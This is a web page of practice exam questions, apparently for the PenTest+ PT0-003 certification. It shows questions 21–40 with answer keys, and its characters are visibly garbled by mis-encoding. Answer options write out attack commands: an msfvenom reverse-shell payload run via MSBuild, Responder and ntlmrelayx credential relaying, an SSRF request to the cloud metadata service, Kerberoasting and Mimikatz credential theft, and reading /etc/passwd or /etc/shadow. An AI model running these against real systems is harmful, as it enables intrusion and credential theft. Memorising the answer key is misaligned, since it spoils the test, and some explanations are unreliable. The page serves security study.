πŸ”

PT0-003 β€” questions

Page 2 of 17 Β· 334 total questions.

Topic 1 Β· Question 21

A penetration tester is evaluating a SCADA system. The tester receives local access to a workstation that is running a single application. While navigating through the application, the tester opens a terminal window and gains access to the underlying operating system. Which of the following attacks is the tester performing?

  • AKiosk escape (correct answer)
  • BArbitrary code execution
  • CProcess hollowing
  • DLibrary injection
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: Kiosk escape

Topic 1 Β· Question 22

Given the following script: Which of the following is the penetration tester most likely trying to do?

Exhibit 1 for question 22
  • AChange the system's wallpaper based on the current user's preferences.
  • BCapture the administrator's password and transmit it to a remote server.
  • CConditionally stage and execute a remote script. (correct answer)
  • DLog the internet browsing history for a systems administrator.
Reveal answer & explanation
Correct answer: C

The correct answer is C. Option C: Conditionally stage and execute a remote script.

Topic 1 Β· Question 23

A penetration tester needs to collect information transmitted over the network for further steps in an internal assessment. Which of the following would most likely accomplish this goal?

  • Antlmrelayx.py -t 192.168.1.0/24 -l 1234
  • Bnc -tulpn 1234 192.168.1.2
  • Cresponder.py -I eth0 -wP (correct answer)
  • Dcrackmapexec smb 192.168.1.0/24 -u "user" -p "pass123"
Reveal answer & explanation
Correct answer: C

The correct answer is C. Option C: responder.py -I eth0 -wP

Topic 1 Β· Question 24

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?

  • Aregsvr32 /s /n /u C:\evil.xml
  • BMSBuild.exe C:\evil.xml (correct answer)
  • Cmshta.exe C:\evil.xml
  • DAppInstaller.exe C:\evil.xml
Reveal answer & explanation
Correct answer: B

The correct answer is B. Option B: MSBuild.exe C:\evil.xml

Topic 1 Β· Question 25

A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be specified in the rules of engagement?

  • ATesting window (correct answer)
  • BTerms of service
  • CAuthorization letter
  • DShared responsibilities
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: Testing window

Topic 1 Β· Question 26

A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitabilty?

  • Acurl ?param=http://169.254.169.254/latest/meta-data/ (correct answer)
  • Bcurl ' ?param=http://127.0.0.1/etc/passwd'
  • Ccurl ' ?param= alert(1} /'
  • Dcurl ?param=http://127.0.0.1/
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: curl ?param=http://169.254.169.254/latest/meta-data/

Topic 1 Β· Question 27

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output: Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?

Exhibit 1 for question 27
  • Aresponder -I eth0 -dwvntlmrelayx.py -smb2support -tf (correct answer)
  • Bmsf > use exploit/windows/smb/ms17_010_psexecmsf > msf > run
  • Chydra -L administrator -P /path/topasswdlist smb: //
  • Dnmap --script smb-brute.nse -p 445
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: responder -I eth0 -dwvntlmrelayx.py -smb2support -tf

Topic 1 Β· Question 28

A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input: Which of the following attack types is most likely being used in the test?

Exhibit 1 for question 28
  • AMDK4
  • BSmurf attack
  • CFragAttack
  • DSYN flood (correct answer)
Reveal answer & explanation
Correct answer: D

The correct answer is D. Option D: SYN flood

Topic 1 Β· Question 29

Which of the following describes the process of determining why a vulnerability scanner is not providing results?

  • ARoot cause analysis (correct answer)
  • BSecure distribution
  • CPeer review
  • DGoal reprioritization
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: Root cause analysis

Topic 1 Β· Question 30

A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts. The executive report outlines the following information: The client is concerned about the availabilty of its consumer-facing production application. Which of the following hosts should the penetration tester select for additional manual testing?

Exhibit 1 for question 30
  • AServer 1
  • BServer 2
  • CServer 3 (correct answer)
  • DServer 4
Reveal answer & explanation
Correct answer: C

The correct answer is C. Option C: Server 3

Topic 1 Β· Question 31

A penetration tester attempts to run an automated web-application scanner against a target URL. The tester validates that the web page is accessible from a different device. The tester analyzes the following HTTP request header logging output: Which of the following actions should the tester take to get the scans to work properly?

Exhibit 1 for question 31
  • AModify the scanner to slow down the scan.
  • BChange the source IP with a VPN.
  • CModify the scanner to only use HTTP GET requests.
  • DModify the scanner user agent. (correct answer)
Reveal answer & explanation
Correct answer: D

The correct answer is D. Option D: Modify the scanner user agent.

Topic 1 Β· Question 32

During an assessment, a penetration tester runs the following command: setspn.exe -Q */* Which of the following attacks is the penetration tester preparing for?

  • ALDAP injection
  • BPass-the-hash
  • CKerberoasting (correct answer)
  • DDictionary
Reveal answer & explanation
Correct answer: C

The correct answer is C. Option C: Kerberoasting

Topic 1 Β· Question 33

While conducting an assessment, a penetration tester identifies the details for several unreleased products announced at a company-wide meeting. Which of the following attacks did the tester most likely use to discover this information?

  • AEavesdropping (correct answer)
  • BBluesnarfing
  • CCredential harvesting
  • DSQL injection attack
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: Eavesdropping

Topic 1 Β· Question 34

A penetration tester wants to attack a server, exhausting its resources and making it unavailable to legitimate users. Which of the following attacks would be best to achieve this result?

  • AIP spoofing
  • BTCP hijacking
  • CPort redirection
  • DSYN flooding (correct answer)
Reveal answer & explanation
Correct answer: D

The correct answer is D. Option D: SYN flooding

Topic 1 Β· Question 35

During an internal penetration test, a tester compromises a Windows OS-based endpoint and bypasses the defensive mechanism on that system. The tester also discovers the endpoint is part of an Active Directory local domain. The tester’s main goal is to leverage credentials to authenticate into other systems within the Active Directory environment. Which of the following steps should the tester take to complete the goal?

  • AUse Mimikatz to collect information about the accounts and try to authenticate in other systems. (correct answer)
  • BUse hasheat to crack a password for the local user on the compromised endpoint.
  • CUse Evil-WinRM to access other systems in the network within the endpoint credentials.
  • DUse Metasploit to create and execute a payload and try to upload the payload into other systems.
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: Use Mimikatz to collect information about the accounts and try to authenticate in other systems.

Topic 1 Β· Question 36

A penetration tester is conducting a wireless security assessment for a client with 2.4GHz and 5GHz access points. The tester places a wireless USB dongle in the laptop to start capturing WPA2 handshakes. Which of the following steps should the tester take next?

  • AEnable monitoring mode using Aircrack-ng. (correct answer)
  • BUse Kismet to automatically place the wireless dongle in monitor mode and collect handshakes.
  • CRun KARMA to break the password.
  • DResearch WIGLE.net for potential nearby client access points.
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: Enable monitoring mode using Aircrack-ng. This option keeps traffic private / properly secured as required.

Topic 1 Β· Question 37

A tester performs a vulnerability scan and identifies several outdated libraries used within the customer SaaS product offering. Which of the following types of scans did the tester use to identify the libraries?

  • AIAST
  • BSBOM (correct answer)
  • CDAST
  • DSAST
Reveal answer & explanation
Correct answer: B

The correct answer is B. Option B: SBOM

Topic 1 Β· Question 38

A penetration tester reviews a SAST vulnerability scan report. The following vulnerability has been reported as high severity: The tester inspects the source file and finds the variable response is defined as a constant and is not referred to or used in other sections of the code. Which of the following describes how the tester should classify this reported vulnerability?

Exhibit 1 for question 38
  • AFalse negative
  • BFalse positive (correct answer)
  • CTrue positive
  • DLow severity
Reveal answer & explanation
Correct answer: B

The correct answer is B. Option B: False positive

Topic 1 Β· Question 39

A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application's end users. Which of the following tools should the tester use for this task?

  • ABrowser Exploitation Framework (correct answer)
  • BMaltego
  • CMetasploit
  • DtheHarvester
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: Browser Exploitation Framework

Topic 1 Β· Question 40

A penetration tester gains access to a Linux computer system. The tester then attempts to enumerate user accounts, including the directories and user default shell. Which of the following commands should the tester use to enumerate user accounts?

  • Acat /etc/shadow
  • Bls /var/usr
  • Cls /home
  • Dcat /etc/passwd (correct answer)
Reveal answer & explanation
Correct answer: D

The correct answer is D. Option D: cat /etc/passwd

Showing questions 21–40 of 334 Β· Page 2 of 17